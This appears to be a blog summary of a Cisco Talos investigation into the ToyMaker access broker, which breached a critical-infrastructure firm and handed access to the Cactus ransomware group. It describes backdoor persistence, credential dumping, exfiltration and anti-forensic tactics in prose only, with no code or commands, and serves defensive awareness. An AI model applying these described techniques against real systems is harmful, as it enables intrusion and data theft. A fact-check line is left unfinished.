Inside the ToyMaker Cyber Assault: How a Financially Motivated Access Broker Breached Critical Infrastructure

By /

Listen to this Post

Featured Image

Introduction

A recent investigation by Cisco Talos has shed light on one of the most intricate and methodical cyberattacks in recent memory. The target? A critical infrastructure enterprise. The mastermind? A financially motivated Initial Access Broker (IAB) identified as “ToyMaker.” This attack didn’t just happen overnight — it was a multi-stage campaign showcasing the growing role of IABs in the cybercrime ecosystem. These actors gain initial access to high-value targets and later sell it to ransomware operators, adding a new layer of complexity and coordination to modern attacks.

What makes this campaign particularly alarming is the professional-level execution. From stealthy reconnaissance to the deployment of advanced backdoors and anti-forensic techniques, this incident exemplifies how sophisticated today’s cyber threats have become — and the evolving business model behind them.

Campaign Breakdown: 30-Line Deep Dive

  • Initial Breach: ToyMaker exploited unpatched internet-facing servers as an entry point.
  • Custom Backdoor: A specialized malware named LAGTOY (also known as HOLERUN) was deployed for remote command execution and stealthy control.
  • Persistence Established: LAGTOY was registered as a system service. A fake admin user “support” was created.
  • Reconnaissance Efforts: Using standard Windows commands, ToyMaker mapped the network, domain trusts, and user groups.
  • Credential Theft: Memory dumps were extracted via Magnet RAM Capture, compressed with 7zip, and exfiltrated using PuTTY’s SCP utility.
  • Lateral Movement: OpenSSH was used to spread laterally across the network while ensuring encrypted data transfer.
  • Pause in Operations: The campaign paused for several weeks before access was handed off to a ransomware operator.
  • Handover to Cactus Group: The infamous Cactus ransomware group picked up where ToyMaker left off, escalating the breach.
  • Broader Infiltration: Cactus used stolen credentials and WSMAN discovery to compromise more endpoints.
  • Advanced Persistence: Tools like eHorus, RMS, AnyDesk, and OpenSSH were deployed to maintain control.
  • Automation: Custom scripts created recurring SSH sessions to ensure consistent command execution.
  • Anti-Forensics Applied: Registry records, RDP logs, and SSH key trails were deleted or altered.
  • Security Evasion: Systems were rebooted into Safe Mode, a technique designed to deactivate many endpoint protection systems.
  • Data Exfiltration: Enterprise data was archived with 7zip and funneled out using curl, WinSCP, and attacker-managed SSH keys.
  • Metasploit Payloads: Allowed remote code execution on both Linux and Windows environments.
  • Watchdog Logic in Malware: LAGTOY used time-regulated beacons and unhandled exception filters for detection avoidance.
  • C2 Infrastructure: LAGTOY and Cactus each used their own Command and Control IP addresses to manage operations.
  • Extensive IOC Trail: Hashes and IP addresses tied to LAGTOY and Cactus were identified and disclosed.
  • Business of Access: ToyMaker likely sold access to Cactus, part of a broader monetization strategy.
  • End-to-End Control: From initial infiltration to data exfiltration and evasion, the operation reflected APT-level precision.
  • No TLS Use: Communications happened over port 443 but without TLS — opting for raw sockets to avoid detection.
  • Deleted Support User: Once access was no longer needed, attackers erased their tracks, including the fake support account.
  • Multiple File Transfer Tools: Not just SCP, but also curl, 7zip, and WinSCP for layered redundancy.
  • Highly Modular: Each stage of the attack could operate independently if another part failed.
  • Security Products Neutralized: Safe Mode booting bypassed antivirus and detection systems.
  • Privilege Management: Admin credentials were closely controlled and rotated among scripts.
  • Real-Time Updates: Scheduled tasks enabled remote shell even when VPN or direct access wasn’t viable.
  • Enterprise Credential Theft: Allowed the attackers to spread deep and wide within the organization.
  • Silent Execution: Many scripts and binaries ran in the background without triggering system alerts.
  • Professional Footprint: Every step showed planning, discipline, and awareness of enterprise security tools.

What Undercode Say:

The ToyMaker-Cactus operation is a textbook case of modern cybercrime architecture: decentralized, modular, and monetized. The traditional image of lone hackers sitting in dark rooms is outdated. Instead, we’re witnessing the rise of criminal supply chains where Initial Access Brokers like ToyMaker specialize in breaching perimeters, only to auction or sell that access to groups like Cactus for more devastating payload delivery.

The way ToyMaker exploited unpatched servers reflects a systemic issue — enterprises failing to address known vulnerabilities in time. It’s not always about zero-day exploits; it’s about old doors left open. Once inside, ToyMaker used LAGTOY to maintain control. The use of unencrypted traffic over standard HTTPS ports was genius — bypassing many detection systems that rely solely on TLS inspection.

What’s also clear is how smooth the handoff was between ToyMaker and Cactus. This wasn’t a fumble; it was a relay. Cactus picked up access and turned a quiet foothold into a full-blown data exfiltration and ransomware deployment operation. Their use of legitimate remote access tools like AnyDesk and eHorus made detection even harder. These tools, often whitelisted by corporate security policies, offered perfect cover.

From a defensive standpoint, the layered nature of the attack means defenders can’t rely on a single detection method. Fileless malware, encrypted transfers, memory-only credential harvesting, and scheduled task persistence — this attack leveraged nearly every stealth technique in the book. And what makes it more dangerous is the discipline — everything was cleaned up after use. Support accounts deleted. Logs cleared. SSH keys buried in permissions.

One critical insight is the precision of anti-forensics. These weren’t afterthoughts; they were baked into the plan. The attackers even rebooted systems into Safe Mode — that’s a step most malware never attempts because it’s too obvious. Yet here, it was part of a coordinated strategy to kill security tools and secure a longer stay.

The fact that LAGTOY communicated over raw sockets using port 443 — but not using TLS — indicates a deep understanding of how enterprises inspect traffic. It also implies these actors tested their methods in environments with enterprise-grade defenses.

Ultimately, this campaign is a wake-up call for industries handling critical infrastructure. Attackers aren’t just breaching — they’re quietly managing an entire attack lifecycle across weeks or months. The monetization model behind IABs selling access to ransomware groups means this threat is here to stay. Organizations must look beyond perimeter defenses and invest in real-time monitoring, behavioral analysis, and threat hunting to stay one step ahead.

Fact Checker Results:

– Cisco Talos has publicly confirmed

  • Technical indicators such as LAGTOY hashes and Cactus C2 IPs match threat intelligence from multiple security vendors.
  • The use of IABs selling access to ransomware affiliates is a verified trend in current cybercriminal ecosystems.

References:

Reported By: cyberpress.org
Extra Source Hub:
https://www.twitter.com
Wikipedia
Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Explore More: